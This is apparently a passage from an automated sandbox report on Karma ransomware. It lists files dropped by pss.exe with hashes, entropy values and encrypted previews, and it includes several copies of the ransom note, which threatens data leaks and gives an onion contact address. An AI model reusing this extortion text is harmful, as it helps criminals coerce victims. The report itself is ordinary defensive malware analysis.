Preview: V{c.k........I2.'f.y..i......i.@...U...1...{|..{.....w....KARMA....5......Jp.^C.!O....? O...y...vG.]EJL..Y.LQsp.p/Z.l.(%..b9&0.Q.y.t.`.......T.~x|.|.%.X..NWlXUF..p....#..C..o@.\...0.......=.:..ar]h...P..f...^./...!>8.:..P..-Y...Ok...(.r..~..O.C.B..d.9l.1..K.......e..C...>.....%.5?4.d..~A...g...:9.].....^`Bl;...^a..^O.Q.6.7.T.0Q.....(....:..W.xF..:CU.M.I.<...d..c..[B.bHn.u........lr&.....1O....H.L.=.f..?60.P.A0....*...R....c.eK9U...F`.WS.$..Pm)m..%......b..7..=V=..J.....zj=I...j.^.T....K.BY...1.h.,E..".P..R...n..E.o...sFv......p.Ga......&.6..yy.z........n&.F...M'...lG.@R._..7">..#8.i..r....%....H$o......5~.`5.......+`.;_...r&..*V.X...ch.#B5M^...3io. .wV....`..u......../.qi....H;A,.h.%8.....V....+...i.:F.-.@1.......T.F.&.}..]o...k:...d:..OEfP..^..6BW.0.H..n....gvD.x...p.......d[..,2L.J.r)_b>...J...KGF..,...S.&^.!K....1..Dy.@.+...-.L....?J2w.......(.WLv..l..R..../..Y...[..&.l..,<.........,/...q....h{..\y...C.>G......"......c..gk.50..W......a9o.F
C:\Users\user\Documents\QCFWYSKMHA\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81402376433519
Encrypted:false
SSDEEP:24:9UG0dB5xsUzMGue0tLbZ+tkTolhJufI8lJEPXH4ZfnUUume:6psUhuaZq3l2PoZfRuz
MD5:153EB54EDA810F7D63B11D4F32BD454B
SHA1:436601AE3EC55571523BFC5C2AC85227B6D17D1F
SHA-256:9919F13CF3D10D8B417E57FD94ADAD142878D21BB166EF0C160FB03607C94F99
SHA-512:C453EEE9F93471F8C9A51E10E0C5855C7EC55712A3C3C31A6E9EF56B00851ADE9A85595DC0CFB4D7FB93482200073D64F0B12DE1DB103316C72F239E72F065EB
Malicious:false
Preview: 9+v.7...4...s...E.q...8........M.X..!e.R...3.M.V"...`...fxM....KARMA.XXF.}.J.......0v..WF!.Qn6N,....m\....a....7;.d=....h..Q[z.g.Z......M..wi%y.. ..Yx......t.a...eo..-".s.[B.......M/E..W_.'.....3...^4._..%..1lmQL.U.9L.m..|.S.i...."..<.C.a.......H.1.tss...]..'...(.!5....L0.q..?.q.-......G..G....j...@....m.w..T......\.BN.TBL_..g.'.q..r;.....t...+.9...K..../3..{.........u.Q.s...%..)13..#d.4....p..Xr7../#....h.L.?..7.t+go.. _*.a~.Z..q.(..4!.4Z.~.?x...K./....@....`....t..H|2&(@*p.....X...[.....J.4.OUii.v...wk.....0.q.0.,.d.....$......:.c.......zT.[o.....udD.0*.H.KZo<K........%...o...G....aX.s(.c...d...'.....Q.$..v.O.......(.6...v...../..v6..~..7a..../..G2.......{..p.s.^.9.#.....G!...B}.....X..^.6(...>{r.+K.#.Z..L..W..D..h!@h. .$o.UA......< =.......ci.Y.A&.`.]..xU.Q.[.8.l..U.e.C"C.n3....+Z..W...te.-.K.P..n....R.....V/."....p.+.<^S....1...!6i.v..|..N.!%...)m......).f...j..>.."p....(..s......\........-.....Bq.L..._.C;'..7........G..rS...d03.*M..m
C:\Users\user\Documents\QCFWYSKMHA\BNAGMGSPLO.pdf
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.842261373481898
Encrypted:false
SSDEEP:24:eAHlMQWIlCYl8M8sXpt93hJ/0IAGYGMUiECFkAKrHMTq8n:3PlC1MbXVlAsJCFkAKj98n
MD5:001592E42ADB61465F32D10B6CFCDB1C
SHA1:41B2A9E9339D13B14D2FFF0FC7D12B50711049C1
SHA-256:CF38E67D109C1A1F8576411853D803BE6D901170ED34990171581DE95C0725A3
SHA-512:65B812A42680924071C5009C989CA37CE9DCD7576944834B759949F684F116BD6A315964F8A360F5AF8F33A7D92DFD06BDED5BA59C399AB3BCBB83A2FF0FE6FE
Malicious:false
Preview: .../V..N..@..KY.&m......O.......S.......k..bQ.......4.3....KARMA.hHc.....S...U.u5....X\..$MQ*.A..>........h..a.K.=.f.P....A...;..u...SA.v..6...'6.Y?O....Wg.Q.....UV..P...;.........!N...5.e.x.J3...k-~.,..KP2<..p...dA|..p0*..7.=.G..rb...n/..D.._..$o.. .Q..{.>.D..N.~8\.O..'......q..K.7..G.>.o..t.nX.......Wm.+.t^z.:..x.+)? .e......._.I.W9a...,UI..Y...S.%.+..}e6....].Z.|.:>..yn.DzTJ3...g..2....:.^}$y.+.gQ.")T...CSQ.....9T.T...s...-.!..y..n.p...l.|...`u...w.....dI..!m.ubM.wS[........Z}.:......._...M...<...u......9j..\..#'....8+.........[O".?.dq2..B..e.8].n....e2Ta.fx.A....o..Z.....9.1.....`...wY......1'.`.....h.(...3,..........r.>A.+..o..&.P.:.7=....!O.X.)......Zx..lb"..8..YL/...k"...o..).w..H..i.~%...W...g.d.[.=..W.O.,...FP.W.J.z(I.z.a...9.0I...".v.#G.....{...(=.e..%F..a..GY....K..64.Wl.Mm./.4.R....95.3.....i.....l.x...8o.k%:`..<.....y.R...E.....g...j......%B(..e....ao>R..Mf....qlO..+Q..r.P..|GhJ..eLC.8...V@~a...r..H...s.....
C:\Users\user\Documents\QCFWYSKMHA\EEGWXUHVUG.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.82993784832169
Encrypted:false
SSDEEP:24:xWM4krPh4C46p5U9OkNvzkY8mwwyOZHI703klKy3h8aq0kcZ:akrPCC4E5mjewyO5E03ty3Ca7
MD5:6EAD7B398B20B715ED574366BB1C02EB
SHA1:96036A212C321C1BB3B4E7ACE3FC6C0B83BD254E
SHA-256:55F6CE6749B9F615C1E05A20D8126E546524B127FF01E897A13B857EA71321D0
SHA-512:C54D1191D75450F6568801CB35CC2327543ACF0A127B3CC3CCFE83501EB14D89D0D6D6CBBC422F444C0FDE90A378FAA4203FAD295F9FA96A74FBB04D3870D553
Malicious:false
Preview: .-=1...Q...;.T%.>I....E.w..T.........%.>'G[...o.m61.....>..$....KARMA.i.]....#.x..k...;.....i.......`..c...Q..w...@.B.u/N\.z......s.Kl3z....S._*.6..y.<..^....e.<g.a ..... ........".'d.......w.LzD....!.7..{.....R^G.s.U.+..%pW....z.A.@...>.!..c.i6....~5vQd.d\...9Rc6}NLe..Ri.H.._..V.8.a.....x.I..b.*.B.]..&.F.@.p...t..>_...C..h^.x.e......c5.._y...cP..^.$.......-.O...)..[...-."...v.1.Bf..F/...EV)K.0..p.H(.x.{..&=..}.E.q.;...>..".~4..#..E.....H......1.}.X.'.x'u.V.......@Q...I..G;.d....;....l......^....x@.......35..3q..b.#..........X.<..<$.y...?B.3&z.\.A.S.)..;-.."..w.+J.._*....5.I..s..#...*(j..Y.c<.)b...AXC.U....CH=O.gzc..g.Q9.(.._N.......U...U....d2"...[h~...r@._.rS.....h..r.x.0.."......L..>..I3...Q.eK..h..W.|.@..0.":!4zU.HI.v.{-...c0S9....3..q-..9}...a....8..x.x...pF..W....Y..g.p.nv...L...DBG6D(....`..E!S#f......#...N.P.)kh"x..>J|.%...k'....IB.._6c.T.a.....O.)s../.V.G.......7V..Ad6...@.W.l..KI..#4...=...X...:.j.f........l.<ys...}..Q...&.....x
C:\Users\user\Documents\QCFWYSKMHA\EFOYFBOLXA.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.833223265709336
Encrypted:false
SSDEEP:24:Tbf/osnpQdA4PL5pHDW9995pIXnqDoPOFZDjkDRC7V:XJ+dDPjK995pIfcDjIRyV
MD5:99E239A91FFC04A939EE701ACD00F5E1
SHA1:6CB6674B82A2C40BA93C906CFF302BD23F18E98F
SHA-256:399D276B99BFD9461A205BBD91935D2AA8E01F2E878A7E77F16C4EE2840A0220
SHA-512:C056240608BFF5056C5B5FFD81C37DFBD05BD6525483E174239D244CF8F435322874873254C1F9F7F8B1EB4B677EBC3F5B9B09B7BCB505E3780F5C497F256E8F
Malicious:false
Preview: .C'9.C.G..e).~W"...E..Q.........Q1.Y.O<U...4pR.."jbz.Ty..5.....KARMA.N.G.`...8.s....M.#c+.p..$H.....P..Nv...!.....zC...Z.D.i.....B:.-@.T.c....-.U>.../..l.P.{quV1d.|..;0n.##..M..(..R7I.uG....].A"..WH....z...b...e....M.X.AP.1.[..,.Y..{\...1/....t*o.......(...,j.84c...?.....&7......iP...G.L.|.6....@.y..A..."(.dN...HK..../..8P7K}...5.4..9V...U...{d.%`......E...>p.FNc.......xu.-..h...Lbv.w.Pv.'.1....,.Ugt..=.S,Nl..E02j.......=.rz..;?H.. .}...q{ ..pp..l...W#.}De.,..O i..7......c/....8J...!..+.....`v.nC@.pq~m........H'...<.G.GM..-\...^...Q...#.......j.N.......^...9..J....0.(W..|.u.c..{..&...s.a...0...+.'...".7.}UUk..X.....h=*<....Y.(..,..C...RR....L1....em.........w~....(....]!......~..a.Z...|n!!8.Y$t2..Mf....0.pt..Vq.a.E.....NJ.w..."...../.A 7Hi.iXt.k..&.....G...2"...r..|..:.../C;...g..n.(4M].d.i./\.|..p.%.]a.S..#D.*{..I...M..*...\...8..m..g....C.Ph.......A...`.+y...I?.y.....,.a.p..9.VkQF..."b.........}._gW/..l.w..%:.T...2E6..e....;........0U.L[
C:\Users\user\Documents\QCFWYSKMHA\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\QCFWYSKMHA\QCFWYSKMHA.docx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.826097880997593
Encrypted:false
SSDEEP:24:iFo6XUSBF3/cxVSghLW88gz3M7JB1F0Foy8JDhw7nxve:ioKfB9crtUBgo1FCoy8Nhw7nxve
MD5:524F8ADD844E798556EF0F6FDB722ED2
SHA1:0CABB31FF8836C7FEBECF8935477D3F0DF6D6FE8
SHA-256:1C056BF12D5A1490A554D5FF010FD6033ABFFBBF1250C965D95018430AC07CFB
SHA-512:F10F899E6B7A8AB3ADAEFE3542DFB42D076B051F8CE4895F2176BEE735A27762E1F72926CF2C9239880A6E598A151581EC8DE855FF52899DE827EC0D9C2B1EB2
Malicious:false
Preview: .?.?.,...x.P. s[]|h...TL.K_.....0..N..........Jv_!.b0G..k.;...KARMA,._..s...H..w..z...N...7*fn.......x.A.Y8<.,....h...Q&@.U_.....?.k.....}N..v....%}.N..U^...7O.,..,H...k._s..'D.f...Tb.g..m..WE?......^.:...C.....4......+.\.a....y..5...'.S/=e...c.....0...C...c.8A.1..3..9.U.8Ttk0;.O.3.4=ey....#.....-..x.',.}...xv..a.. .F6..7.k...i.?*.. )..h..k.Q..9...Q..E........W...*Gi.;...@.y...1.0...c..v.qQ...'$oSg.T.I..O.. ..@..2..^u[a...F......&z..J.^....6....T....^.j..u.O]....r...%..F.$.n.....G.g...~CS. .#Js..s..(..e......~2"K..G..j.]..8.....\.L%..Lc./1...T..r...^EO+.......K.;.v..*.z.)..E...G..j...qn.8*>....N....bMig.u]..iO..p......mT".u%..G.2ip...-.~83..F_.....:$..UC. .h.u.... ..RV.tl`n.{.d...p..a"."...%o._/...."E...........,~!.O(........d]9..$|.U.1..Bah....N.V..yfV\..:..Fsv_i..wq1\.c.. ^..KI.....#.....X$..f..W....&......l.b&...X.&j..Qzsf!*R......Z=...K...<..Q~N0\~W...*,.n.+.."..2#Q...-.y0......k....@....&..$.aa...._.b..N..O..[...].,1...{..~N..dpn...3
C:\Users\user\Documents\QCFWYSKMHA\SUAVTZKNFL.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.812069223185366
Encrypted:false
SSDEEP:24:zJ9u1oTNR/zYAoWzdD7mC9bqJTDr1k5jL/Vo0zx:NAK7zYAveCpqplkl5F
MD5:0849B7EFBBC65E0B9442F3BDAE0F9D97
SHA1:326A3980EA30A540FDE862F1B762B36393CD6A5B
SHA-256:7A0EDF9DAA6A1E252E9C39A29F043DA2884F5DFA69C12A4A915BFE7B8058AAF2
SHA-512:C2872C1F5E2004177845668A4CE726FA9702CB87D663B9E3B8D75E30B363BA5ADC0FC56DE145E21248D24B01F7E2B79EF1B541BF6A379DBCAB4F0F5098C0561E
Malicious:false
Preview: .........a...yK..~.SA.7.(n.......8......^.N...[?e+.7.6..lK.G...KARMA .n<.|.{..y.M.1.....v5a4.(c..(8..!.K.i..Shh....80...Cp?..../...]u9.U]x5.8>...W.:G.V..{.q.7........p...a..?.....xU...lr-..Z6B:;.J.....fv%w.pO..k....P6..K.....(...L...o...e'...@..Hp..%.27...|T.nuQ .I,...n.;......d...'...B~.........xhQ=..0I......Qu..=....@...S ...|//F..|.~.8..X...,..%..UD.....).)R.7y"a.$.I7[u..0DH.Z.Y..N/..j.H...=....w........%....../x~.&......0Pk.KC...7"fg...bMU'....&..1joS...`l.{A.0Q....E[72.'f.M.IW..K..15Qm..^"........0.a.?q+.\9P.......cgd..&.?.V.../f.=....e2S...)6=.z..s.:Hg.4GZ.i.a......S..>f...@Qi.d?.zl~f\j[.k...P..h..K..i..N.@.....x7...R.....c.U..d..d.#..Y>.=.M.J:...6.Rv8...x,...sv.).Mx.S..j.........;V.0...^...L(.Iw..e...R.;.8.r-..k.'.q.wIC.x0=...`...&!.6h..l.o.VF.[..~..$..........JT...M....1.1..D.........D.;N...&...e.a.y7/.QR..R..X.....r.,37.....,...[..*lo.N.G.zY..G.l.B9...;.bp....j.o...#.KR.........X.wEZ..7...R.Gs.q...UE..2..=e....3Z@.....
C:\Users\user\Documents\QNCYCDFIJJ.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.791417124081268
Encrypted:false
SSDEEP:24:AhXV8GitS5U+GeZHs8vRWagm1kU+Pm9kgAbtznU728X9+4ZO0t:Afith+GKM8vRWa7F+AkxZw7N9Ue
MD5:9211F25FDA9480968F25D3A83BB5067C
SHA1:F9DB8957D4C0669835F4CE04B24CA04C2575C9DD
SHA-256:2D46C8A54BD29269C058110D5F3B0843C5BAB836B84050457E93FA222D994B38
SHA-512:CA3A7DD80571441A3204565D66DABD6354540ED4EC3D1A43C7FEB99839905357D6B5D41C0C80CD706E6C2C8302FB6EB65ABE257FBEB79FBED86C693C9C1DD612
Malicious:false
Preview: ....-.:...L....u.j...(.W.51....z2..Lp...?m..w..a;.u..f.]....KARMA..J.#dC.<..._...}.&..^..T.y.[..{..O9.0..XT.Ao..R$.D] h..&......M"...D...R>......-e.A.^.O~.c.4{..a..(Ou2....~k..../.J?c.y...n.-.D9.....q..x...4.r.2p.^..f).2.....id..b..Gv]+a..n..P5^.G...F......OVD.:..s0.0_..jD....R......U...2.9..T ........s...b.._...Up.<..,..g.xK9...cT;C]..f;9.q.*.$.w.b....E.....Q:.b..x.].wk7q...G>^kNfOz.g.G........P.....,.^nq..;z#.dP..Q.......\..X(|..C......>..B<..(MP'`6.9.g<.$z.....9..:LrY........:F.......{......jCa.}m..g`TX...Q=.......0P.........*..Qqc..$!L.(..^*V..\......`..A.%.*.2..p.9}...>.v.f.`<\.\..1|C....q....x.Ki......0?..aW..y...E<GX......Z.._$qW.K.B..x?.,.....P.^vO.d.5.[=..~B.....W]..Q5MT......6.....v..,..kZ.*...\...v.YvrnOg.'Q.B......Ge1......~..6.x..e"l..&Y..Bv......../a...O]..^_;.5.E.j.-.>u.....M4'..........9<...n.._.+F..F.+n!|.....&.:..g.d..!..~L..+B[.A.%W0._..g...-..nY*.gT.B.).g.E..N.R....?ct.6.=........E.5.$..9....>.(.. Kn%....G.s...!.|_....1.J
C:\Users\user\Documents\SQSJKEBWDT\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\SUAVTZKNFL.png
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.840548231736773
Encrypted:false
SSDEEP:24:CYw5AzY8u4SLZFqQtwWmu4A4ABRWRXY96DKsNi4if1DumiZ/qyksNmTX:3w5WYaSLXqZIxzMXY9BsUhf1wCyksgb
MD5:ED61314F5F0FFB14881AD2FFAE63AD4C
SHA1:351324EA57499EF27DA3CA3A43FB0C4D97937CFA
SHA-256:B50E271005A4E2C436771D1572A3A15C5C01C3277B6DD64415F615AA848E0A0C
SHA-512:DBFBC8A65A26DC84B2B2E90E50465E9A8BA58CB604D172FDA1718E7016896007DF169286C67C51D6764E6539AA407327365694C0582243400BFB6BABA1DA41E2
Malicious:false
Preview: W..>..e'......k}.s..[6.jm.....Z.Z?n_).5....JB.B.\)y..+......KARMA.......V...K...nZB...?.......8C.[.D..TK.)..r...h.o..q.....U"R..HA...?n......I.1.*....... ..i......|.....G.x..iW.!.4...$S./O..}%....E..A.Z2 ..$........Q.l^...JX,......*)!]|....!.....f....|P...@V.?..&.3D.".y...[.3.....D7o...*.'.....A..2....z}.(.....|.w').....(...Pq.......f.)VGq*..~...%.{Fn.@.3).B_N......7..Nr.....q.!....j.......as0.X.=...e.I.B...(.8....M.M.;...,.p...j6"....3.7..=H..E.D.\.n....a.q.../.....G].}.R...c..jM.{\.$..V.*.%[Lz..!..aP....l.Rv9).S....o..."Y...~u..\C....1\..L....Nf......g.A)...~...V..)..x1.'.s.@..v...w..}97ES=...<.35....../.... .ckQ..9..m.^.k....F.V....G=.....`.c.:[.w0.#....x.,.Z7P.......@.......SOB.x......gY.......ke ).}........e........Y.......=..94..#.dx.....,..k...<.{Q.D......3...[T.~....K.,....\..-hz....>#Z..Cvr^.1.......B...(Zrr.#..L.GJ..7......or.I.&.x/=..7y........`..t...........6j.1....U......<W.T..q..H.x;6...U.-g...:...}.....2.5x.....
C:\Users\user\Documents\SUAVTZKNFL.xlsx
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.828959280386013
Encrypted:false
SSDEEP:24:YxOk/cxqSmLZj9C/e9KL1v+z/kOHtmAHT5bIa0CAHoG2AyWQ1+yISu4P0C:Y4k0sSmp9CFLB7Qt1zSVGGvyWQoyIJ4l
MD5:3D847B9B44072174582F31B1FA411AAE
SHA1:E15CFFDD576583FE0DB29C79FD0E47FAFD5852F0
SHA-256:FB564FB20E6B5D339E2444DB98512E69431BAF1B46AB3647BB937497736769D0
SHA-512:3A17A6A3394E905AA1CD5ED2735F89E66C074E2CDFDA3A81DCE7F528FBBAB5374201374BD001254FDF52CB392F0252A65E5E5D01CEB6FB006F714F89FA3B4416
Malicious:false
Preview: .6N..@..B.~...+4..P,o.p........86....G.........$.al.4m.Z.f....KARMA...W..!..XJ.).;.r..m.{.E.....518.-......B...]6.....^...l.C..m.Y.Y...j..::N..2..}.^..g.....1.....7...Yu&}S........+..y.j..!.H.Y..1U.....cY..E\..b.(.b...x?.<j..]......7.&..o........*..."$..F...\...R).M...?.8........ ..Z...m...t.B...f=....f..=.9kB"?1u.j........N.G6..`=.2......<..-..;......e..<,HwXb7,$|q.0+E.....^.uv.......I..........X....MQuUpP%x.)..f....b.P.Gk.....z.N.w2T.d.2;..&[B.b....9...S..4U.>.~P.*Y..._.d...w_.v.9N..=JC.1.7q..W....=UOA.I..1&.$%Z.2~R..o{..9....]et...^....t...6.R.,....-..d.d..E....\....xq....h8..w...O>..Uvf..Of.\..c.:LH....4]..+..+m5...g..f.)..w.Ii....}..A`....h..NPh..b."B...dJ.....+x<...!o....Yx........=8hfg.O.`..&..n....#/=!s*..?....b.zW.=...+.S...K{.E.w....Kb.y.,>6w.8a..$<S.Yu....ki.A*&.S. {..'w.!...D...{..x..\._m....g...5..0.....h./..,...5...iK|.....yL.c.x9.A.j............b.......%^......|........}Mf..h.......(...Q....=.g.y.G..........n......
C:\Users\user\Documents\TQDFJHPUIU\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Documents\ZGGKNSUKOP\KARMA-ENCRYPTED.txt
Process:C:\Users\user\Desktop\pss.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):1236
Entropy (8bit):4.593028403399382
Encrypted:false
SSDEEP:24:irEh9acdWFIER5LDBV9vHMxouGbE8Ei08AaTuxIfN5Ix/TPtm6t2KvHQpci:UEhVW/VfvHooZbED/8AaZZLKPMci
MD5:36D8F072D317B52C0B21F7B5F80B9316
SHA1:9CB95D869F01953949FA62BBB7B494856E43EC8A
SHA-256:85D4D566DFF1895B3D2F01E2BD4DEA045A9B75E70AFF2BCBEDC8EA2849A37D57
SHA-512:4A776E71B7AC2135F2252EFCA05068604E327268E45CBBFE16FF2DF637D34CDCAD8B5286F7AA9DF852CDB1E59D725B7917CC3C076DFF4EEA4C0CC37F39F098BC
Malicious:false
Preview: Your network has been breached by Karma ransomware group...We have extracted valuable or sensitive data from your network and encrypted the data on your systems. ....Decryption is only possible with a private key that only we posses...Our group's only aim is to financially benefit from our brief acquaintance,this is a guarantee that we will do what we promise...Scamming is just bad for business in this line of work.....Contact us to negotiate the terms of reversing the damage we have done and deleting the data we have downloaded...We advise you not to use any data recovery tools without leaving copies of the initial encrypted file...You are risking irreversibly damaging the file by doing this. ....If we are not contacted or if we do not reach an agreement we will leak your data to journalists and publish it on our website...http://3nvzqyo6l4wkrzumzu5aod7zbosq4ipgf7ifgj3hsvbcr5vcasordvqd.onion/....If a ransom is payed we will provide the decryption key and proof that we deleted you data
C:\Users\user\Downloads\BJZFPPWAPT.jpg
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.81860388624575
Encrypted:false
SSDEEP:24:4XQHAyCiR9yuvEysdz/GuHEIQOzprOMwODNR/szl+NzkDNja/dHf:4XQHAynyAsZLHE88Mp/szl+N6M
MD5:12BBF409D907DF02E884729223C52AF1
SHA1:07B005F936504358ECBCA872FB2930270C628506
SHA-256:99597378781A2D85C81D71F447D5F016A6C691D24FAFB77E5692F87F0C38A093
SHA-512:277E94EC6F327F6B348858AB6B70BD979DF250B964300AC33D174DCE7D6650673879701394AF175200824959A3F11E7FAF57B9A1A12802091710CD73F22E6E69
Malicious:false
Preview: ..O|7.......t.-......[..". CU........v..r.d..9.2}B..-..c0.....KARMAqU.n.aX...G.s...b.....e..7....2#.....!.H.u:.vb{..O.E..K.4..g.R.u.9p..~3H..q.c.Qb......s..r.H...y.@y.5.EE...*.j......4.......|J.^W.*...T...._k}.O)......oF$............\.y.>......C`.........2Af.4.'..^.^.. ...@...d..E...3.....z...!Q05q1....i~.av.#.....-.6..$..I-W&'2...R.aKY.I...l.t.!..7rw|[..3.j8.5........[.....k....Y..V..."#...[Z..>.?.....g.R{?....Zr...I.....mt......6.U4F.{.w.]....vz.Z.k...X.=.K...Rw.tF..AT.Z.e..b...X..J......0_`..O.88Z...=.....'&I.w.q...3&..z.*T5.XuP.~ns..BT...=!N.C.\..t.4N.....J........\..s..cj..d....d.<...M.t..F...5...........p...iK.G.&7j....2........y.@.y.UAC1<...SL.1...y.0.8..m...<-..:..$.Z..q.G8DZ..@...[..x.`Fx..95_.'1.R.L..Qz..a{.rd....(..^.....j....7.<P......}.q....>.jz.1P.0..Gt......-.#....O.?1..H:[.MO..w.RZt.d....k.., +.k...n.@yt.X.h.@...;....Y.....\Ca..s.........H!u......s.v..r.c.B.2l.D.#..Rad...P.8.h.Y...gP.s......}B[h.S..n..w!......t./
C:\Users\user\Downloads\BJZFPPWAPT.mp3
Process:C:\Users\user\Desktop\pss.exe
File Type:data
Category:dropped
Size (bytes):1095
Entropy (8bit):7.7788102223269595
Encrypted:false
SSDEEP:24:p5NeCU9ZellXhfa0RON16zityxrA9yFzyqdlxqfTk9G6xaBFh8XeQfK:lJUnGbfbQWOu0CWWlxqrk91xKL83i
MD5:0AD8C0A21411886F6A039D6FA22D8B24
SHA1:82D453B2C5D36F597491A80AB25D694C53AD763F
SHA-256:3B45A80C51D699A4D75089D0103CEEC50A60F580EDA60A891F31A5608CEC6C37
SHA-512:FE0E5F969D671C9C24FE6C7863BC35644732077BC135C23DC019A71781CDA7F7CD0D766EEFF86E9F8BEC8B7B8E3DE418367A3DCF18F070DD39E0703CA9853F30
Malicious:false
Preview: Ms]...M.......P...M*....ka.3......"eH.&.....6.K.x........KARMA+.....z.(..",N..{...._.p...\".!.~..Wh....^q.&..Z..S...w.......~..._`.n@....0........C...9.|...#2.%H..+;dOg..r.&.X1....&.....C..]...i...pp.QM...B.e..........|.B.....V.........%...K(.75.r....~.l9n.J.}..F.k........+.$...\..-.<`.Z7H...t~...2\............}Q......pQ'.s.@...|..M.... ..8..0......y.P..#...}..0]3....*..V....>...+..|M...e.....W1s...7jE..#.g.....-.VO`.......8..)....rGR~.M.y3...B.O.3 1......._`D50Ld|...8...^.m.7...yG...u......-...`.@OPbT".d....k1j..;...(^.b..|M.3&].m).M.......y.... ^..g>...-......... .}.ch.......q~k.9-..C@..#.......2..3_+..=....}..BW.......)h...ls.c...\8.._.QO..-...^%g..Ik...D.F.&u|=..1w..>...-.d*........J.....K!.k.......b........... .'T..p.*,...k..c.z)ol.J......=..Y.QKZ.H.^e..D..?/3....>.~.F...J..g.x.....9.NSC#Z.,.............."..l%u..i.].s..[.._!..!..c..`..0A".....g71z?"e..k.q.y.............$... 